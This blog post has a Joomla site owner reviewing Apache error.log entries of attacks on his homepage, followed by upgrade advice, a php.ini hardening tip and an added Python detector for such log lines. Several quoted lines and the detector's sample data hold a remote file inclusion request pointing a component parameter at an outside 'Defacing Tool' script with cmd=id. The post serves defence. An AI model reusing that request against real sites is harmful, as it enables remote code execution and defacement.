Hackers are using scripts to hack my page…
I’ve already tried to reduce the attack surface of my homepage by removing all unneeded components, modules and mambots, but below is what I’ve found in the log files…
Hackers trying remote code injection
These were found more than once in the Apache error.log:
[Thu Aug 17 17:29:05 2006] [error] [client 184.108.40.206] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0
Remember: you should update the following components to their latest version as soon as possible:
- com_securityimages < 3.0.5 use at least a version > 3.0.6
- com_hashcash < 1.2.1 use at least a version > 1.2.2
- com_bayesiannaivefilter has been developed but never released as a component, but it is still available in the #Joomla forge developer tree.
This attack tries to execute a script located at http://recon.reschat.dk/images/gallery/tool25.txt. If you go there, you’ll find that the script is readable and contains a header:
Defacing Tool 2.0 by xxxxxx
"Defacing Tool 2.0 by xxxxxxx" is a suite of PHP-based scripts that allows the attacker to send commands to the server, primarily with the intent to deface websites.
- For com_bayesiannaivefilter: sorry guys, but I do not have this plugin, nor has it ever been released in the wild. For com_securityimages or com_hashcash, just upgrade!
- If you manage a web host that you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable. In /etc/php.ini: allow_url_fopen = Off
Hackers trying to access well known PHP files
Each of the lines below appeared more than 500 times… in 1 day:
[Fri Aug 11 19:11:50 2006] [error] [client 220.127.116.11] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
[Mon Jul 31 13:07:12 2006] [error] [client 18.104.22.168] user not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 22.214.171.124] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Sat Feb 18 21:44:47 2006] [error] [client 126.96.36.199] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan
Hacker trying to access files that do not exist
- [Tue Aug 01 21:09:46 2006] [error] [client 188.8.131.52] user not found: /administrator/components/com_uhp/uhp_config.php
- [Tue Aug 01 20:43:03 2006] [error] [client 184.108.40.206] user not found: /administrator/components/com_colophon/admin.colophon.php
- [Mon Jul 31 20:11:25 2006] [error] [client 220.127.116.11] user not found: /administrator/components/com_mgm/help.mgm.php
These look like programs brute-forcing a set of paths by rule, searching for well-known vulnerabilities.
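The two patterns above (a request parameter pointing at a remote script, and one client probing many component paths) can be pulled out of an error.log automatically. The following is an added example, not part of the original post; the sample lines are constructed (documentation IP ranges, example hosts) and the threshold of three distinct components is an assumption to tune.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache error.log layout used on this page: [timestamp] [level] [client IP] message
LINE_RE = re.compile(r"^\[([^\]]+)\] \[(\w+)\] \[client ([^\]]+)\] (.*)$")
# Query parameter whose value is a remote URL: the remote-include pattern
# (the optional "[" tolerates the stray bracket seen in the log line above)
RFI_RE = re.compile(r"[?&]([\w\[\]]+)=\[?((?:https?|ftp)://[^\s&]+)", re.I)
# Auth or not-found errors for a script under a Joomla component directory
PROBE_RE = re.compile(r"(?:user not found|File does not exist): \S*/components/(com_\w+)")

# Constructed sample lines, not real traffic
SAMPLE = """\
[Thu Aug 17 17:29:05 2006] [error] [client 192.0.2.10] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://attacker.example/tool.txt?cmd=id HTTP/1.0
[Tue Aug 01 21:09:46 2006] [error] [client 198.51.100.7] user not found: /administrator/components/com_uhp/uhp_config.php
[Tue Aug 01 21:09:47 2006] [error] [client 198.51.100.7] user not found: /administrator/components/com_colophon/admin.colophon.php
[Tue Aug 01 21:09:48 2006] [error] [client 198.51.100.7] user not found: /administrator/components/com_mgm/help.mgm.php
[Tue Aug 01 21:10:02 2006] [error] [client 203.0.113.5] File does not exist: /var/www/vhosts/example.org/httpdocs/favicon.ico
[Tue Aug 01 21:10:05 2006] [error] [client 203.0.113.5] user not found: /administrator/components/com_uhp/uhp_config.php
"""

def analyze(text):
    """Return (rfi_attempts, probe_counts) for an error.log excerpt."""
    rfi, probes = [], Counter()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected layout, skip
        ip, msg = m.group(3), unquote(m.group(4))  # decode %-escapes before matching
        hit = RFI_RE.search(msg)
        if hit:
            rfi.append((ip, hit.group(1), hit.group(2)))
        probe = PROBE_RE.search(msg)
        if probe:
            probes[(ip, probe.group(1))] += 1
    return rfi, probes

def scanners(probes, min_components=3):
    """Clients that probed at least min_components different components."""
    seen = defaultdict(set)
    for ip, comp in probes:
        seen[ip].add(comp)
    return sorted(ip for ip, comps in seen.items() if len(comps) >= min_components)

if __name__ == "__main__":
    rfi, probes = analyze(SAMPLE)
    for ip, param, url in rfi:
        print(f"remote include attempt from {ip}: {param} -> {url}")
    print("likely scanners:", scanners(probes))
```
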
Some strange attempts…
[Tue Aug 01 18:49:11 2006] [error] [client 18.104.22.168] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 22.214.171.124] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 126.96.36.199] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 188.8.131.52] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Mon Jul 31 16:58:44 2006] [error] [client 184.108.40.206] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
[Fri Jul 28 23:04:35 2006] [error] [client 220.127.116.11] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com